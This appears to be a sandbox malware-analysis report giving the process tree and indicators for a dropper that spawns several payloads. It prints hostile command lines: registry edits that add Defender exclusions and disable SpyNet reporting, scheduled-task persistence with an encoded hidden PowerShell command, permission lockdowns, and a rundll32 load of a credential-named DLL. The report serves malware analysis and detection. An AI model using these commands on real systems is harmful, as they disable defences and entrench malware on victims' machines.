pid Process 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe -
Suspicious use of SendNotifyMessage 48 IoCs
pid Process 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1352 wrote to memory of 536 1352 file.exe 76 PID 1352 wrote to memory of 536 1352 file.exe 76 PID 1352 wrote to memory of 536 1352 file.exe 76 PID 1352 wrote to memory of 620 1352 file.exe 77 PID 1352 wrote to memory of 620 1352 file.exe 77 PID 1352 wrote to memory of 620 1352 file.exe 77 PID 536 wrote to memory of 1500 536 Player3.exe 78 PID 536 wrote to memory of 1500 536 Player3.exe 78 PID 536 wrote to memory of 1500 536 Player3.exe 78 PID 1352 wrote to memory of 2892 1352 file.exe 79 PID 1352 wrote to memory of 2892 1352 file.exe 79 PID 1352 wrote to memory of 2892 1352 file.exe 79 PID 1500 wrote to memory of 5012 1500 nbveek.exe 82 PID 1500 wrote to memory of 5012 1500 nbveek.exe 82 PID 1500 wrote to memory of 5012 1500 nbveek.exe 82 PID 1500 wrote to memory of 4980 1500 nbveek.exe 84 PID 1500 wrote to memory of 4980 1500 nbveek.exe 84 PID 1500 wrote to memory of 4980 1500 nbveek.exe 84 PID 2892 wrote to memory of 3592 2892 zhangfan.exe 87 PID 2892 wrote to memory of 3592 2892 zhangfan.exe 87 PID 2892 wrote to memory of 3592 2892 zhangfan.exe 87 PID 4980 wrote to memory of 4216 4980 cmd.exe 89 PID 4980 wrote to memory of 4216 4980 cmd.exe 89 PID 4980 wrote to memory of 4216 4980 cmd.exe 89 PID 4980 wrote to memory of 1808 4980 cmd.exe 88 PID 4980 wrote to memory of 1808 4980 cmd.exe 88 PID 4980 wrote to memory of 1808 4980 cmd.exe 88 PID 4980 wrote to memory of 4936 4980 cmd.exe 90 PID 4980 wrote to memory of 4936 4980 cmd.exe 90 PID 4980 wrote to memory of 4936 4980 cmd.exe 90 PID 1500 wrote to memory of 396 1500 nbveek.exe 92 PID 1500 wrote to memory of 396 1500 nbveek.exe 92 PID 4980 wrote to memory of 2424 4980 cmd.exe 93 PID 4980 wrote to memory of 2424 4980 cmd.exe 93 PID 4980 wrote to memory of 2424 4980 cmd.exe 93 PID 4980 wrote to memory of 3920 4980 cmd.exe 94 PID 4980 wrote to memory of 3920 4980 cmd.exe 94 PID 4980 wrote to memory of 3920 4980 cmd.exe 94 PID 4980 wrote to memory of 1792 4980 cmd.exe 95 PID 4980 wrote to memory of 1792 4980 cmd.exe 95 PID 4980 wrote to memory of 1792 4980 cmd.exe 95 PID 1500 wrote to memory of 4848 1500 nbveek.exe 97 PID 1500 wrote to memory of 4848 1500 nbveek.exe 97 PID 1500 wrote to memory of 4848 1500 nbveek.exe 97 PID 4712 wrote to memory of 4824 4712 rundll32.exe 99 PID 4712 wrote to memory of 4824 4712 rundll32.exe 99 PID 4712 wrote to memory of 4824 4712 rundll32.exe 99 PID 1500 wrote to memory of 976 1500 nbveek.exe 103 PID 1500 wrote to memory of 976 1500 nbveek.exe 103 PID 1500 wrote to memory of 976 1500 nbveek.exe 103 PID 4848 wrote to memory of 3372 4848 handdiy_1.exe 104 PID 4848 wrote to memory of 3372 4848 handdiy_1.exe 104 PID 4848 wrote to memory of 3372 4848 handdiy_1.exe 104 PID 3372 wrote to memory of 764 3372 cmd.exe 107 PID 3372 wrote to memory of 764 3372 cmd.exe 107 PID 3372 wrote to memory of 764 3372 cmd.exe 107 PID 976 wrote to memory of 3192 976 random.exe 108 PID 976 wrote to memory of 3192 976 random.exe 108 PID 976 wrote to memory of 3192 976 random.exe 108 PID 732 wrote to memory of 1228 732 rundll32.exe 111 PID 732 wrote to memory of 1228 732 rundll32.exe 111 PID 732 wrote to memory of 1228 732 rundll32.exe 111 PID 1500 wrote to memory of 1224 1500 nbveek.exe 116 PID 1500 wrote to memory of 1224 1500 nbveek.exe 116
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1352 -
C:\Users\Admin\AppData\Local\Temp\Player3.exe"C:\Users\Admin\AppData\Local\Temp\Player3.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:536 -
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe"C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1500 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F4⤵
- Creates scheduled task(s)
PID:5012
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\16de06bfb4" /P "Admin:N"&&CACLS "..\16de06bfb4" /P "Admin:R" /E&&Exit4⤵
- Suspicious use of WriteProcessMemory
PID:4980 -
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:N"5⤵PID:1808
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:4216
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:R" /E5⤵PID:4936
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:2424
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\16de06bfb4" /P "Admin:N"5⤵PID:3920
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\16de06bfb4" /P "Admin:R" /E5⤵PID:1792
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000040001\pb1111.exe"C:\Users\Admin\AppData\Local\Temp\1000040001\pb1111.exe"4⤵
- Executes dropped EXE
PID:396
-
-
C:\Users\Admin\AppData\Local\Temp\1000042001\handdiy_1.exe"C:\Users\Admin\AppData\Local\Temp\1000042001\handdiy_1.exe"4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4848 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
PID:3372 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:764
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"5⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5072 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc47fa4f50,0x7ffc47fa4f60,0x7ffc47fa4f706⤵PID:2628
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1684 /prefetch:26⤵PID:2588
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1956 /prefetch:86⤵
- Suspicious behavior: EnumeratesProcesses
PID:4404
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2240 /prefetch:86⤵PID:652
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2856 /prefetch:16⤵PID:3036
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2948 /prefetch:16⤵PID:4584
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2092 /prefetch:16⤵PID:4164
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3688 /prefetch:16⤵PID:3344
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4644 /prefetch:86⤵PID:3996
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5028 /prefetch:86⤵PID:1484
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5256 /prefetch:86⤵PID:3532
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5396 /prefetch:86⤵PID:4752
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5532 /prefetch:86⤵PID:1280
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5972 /prefetch:86⤵
- Suspicious behavior: EnumeratesProcesses
PID:3600
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5444 /prefetch:86⤵PID:3728
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5056 /prefetch:86⤵
- Suspicious behavior: EnumeratesProcesses
PID:620
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5360 /prefetch:86⤵PID:3732
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5240 /prefetch:86⤵PID:3996
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5400 /prefetch:86⤵PID:3536
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5856 /prefetch:16⤵PID:4316
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5316 /prefetch:86⤵
- Suspicious behavior: EnumeratesProcesses
PID:4076
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5276 /prefetch:86⤵PID:1208
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5536 /prefetch:86⤵
- Suspicious behavior: EnumeratesProcesses
PID:3744
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2528 /prefetch:86⤵PID:4512
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2556 /prefetch:86⤵PID:384
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4964 /prefetch:86⤵
- Suspicious behavior: EnumeratesProcesses
PID:4764
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000043001\random.exe"C:\Users\Admin\AppData\Local\Temp\1000043001\random.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:976 -
C:\Users\Admin\AppData\Local\Temp\1000043001\random.exe"C:\Users\Admin\AppData\Local\Temp\1000043001\random.exe" -h5⤵
- Executes dropped EXE
PID:3192
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000045001\setup.exe"C:\Users\Admin\AppData\Local\Temp\1000045001\setup.exe"4⤵
- Executes dropped EXE
PID:1224 -
C:\Users\Admin\AppData\Local\Temp\7zS271.tmp\Install.exe.\Install.exe5⤵
- Executes dropped EXE
PID:5040 -
C:\Users\Admin\AppData\Local\Temp\7zS714.tmp\Install.exe.\Install.exe /S /site_id "385107"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
PID:3412 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"7⤵PID:4712
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&8⤵PID:4064
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:329⤵PID:3924
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:649⤵PID:4488
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"7⤵PID:4560
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&8⤵PID:1836
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:329⤵PID:1088
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:649⤵PID:1620
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gpYZgDThj" /SC once /ST 07:50:12 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="7⤵
- Creates scheduled task(s)
PID:3728
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gpYZgDThj"7⤵PID:1020
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gpYZgDThj"7⤵PID:4848
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bnNSajhVxJSdGghoLZ" /SC once /ST 21:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\FomiwILaecWgGNOLA\UxpymuaMygfozov\NbuyrFd.exe\" kl /site_id 385107 /S" /V1 /F7⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2452
-
-
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main4⤵
- Loads dropped DLL
PID:4572 -
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main5⤵
- Loads dropped DLL
PID:4424 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4424 -s 6806⤵
- Program crash
PID:3732
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\birge.exe"C:\Users\Admin\AppData\Local\Temp\birge.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:620 -
C:\Users\Admin\AppData\Roaming\W8xBG2CB.exe"C:\Users\Admin\AppData\Roaming\W8xBG2CB.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
PID:1088 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /TN "2.5.5.Microsoft.NET\AgentActivationRuntime2.5.5.\IntelPalnt2.5.5." /TR "C:\ProgramData\Mslprojector\WlndowsDraiver-Ver2.5.5.8.exe" /SC MINUTE4⤵
- Creates scheduled task(s)
PID:772
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\ProgramData\Mslprojector" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)"4⤵
- Modifies file permissions
PID:620
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\ProgramData\Mslprojector" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)"4⤵
- Modifies file permissions
PID:828
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\ProgramData\Mslprojector" /inheritance:e /deny "admin:(R,REA,RA,RD)"4⤵
- Modifies file permissions
PID:2012
-
-
-
C:\Users\Admin\AppData\Roaming\nEzF0Hw6.exe"C:\Users\Admin\AppData\Roaming\nEzF0Hw6.exe"3⤵
- Executes dropped EXE
PID:4620 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Roaming\nEzF0Hw6.exe4⤵PID:1996
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 05⤵PID:1296
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\zhangfan.exe"C:\Users\Admin\AppData\Local\Temp\zhangfan.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2892 -
C:\Users\Admin\AppData\Local\Temp\zhangfan.exe"C:\Users\Admin\AppData\Local\Temp\zhangfan.exe" -h3⤵
- Executes dropped EXE
PID:3592
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4712 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open2⤵
- Loads dropped DLL
PID:4824 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4824 -s 6003⤵
- Program crash
PID:824
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4824 -ip 48241⤵PID:2368
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:732 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open2⤵
- Loads dropped DLL
PID:1228 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1228 -s 6003⤵
- Program crash
PID:1728
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1228 -ip 12281⤵PID:1788
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1352
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5012 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4064
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:3120
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:764
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:800
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
- Executes dropped EXE
PID:3988
-
C:\ProgramData\Mslprojector\WlndowsDraiver-Ver2.5.5.8.exeC:\ProgramData\Mslprojector\WlndowsDraiver-Ver2.5.5.8.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:4852
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 472 -p 4424 -ip 44241⤵PID:1864
-
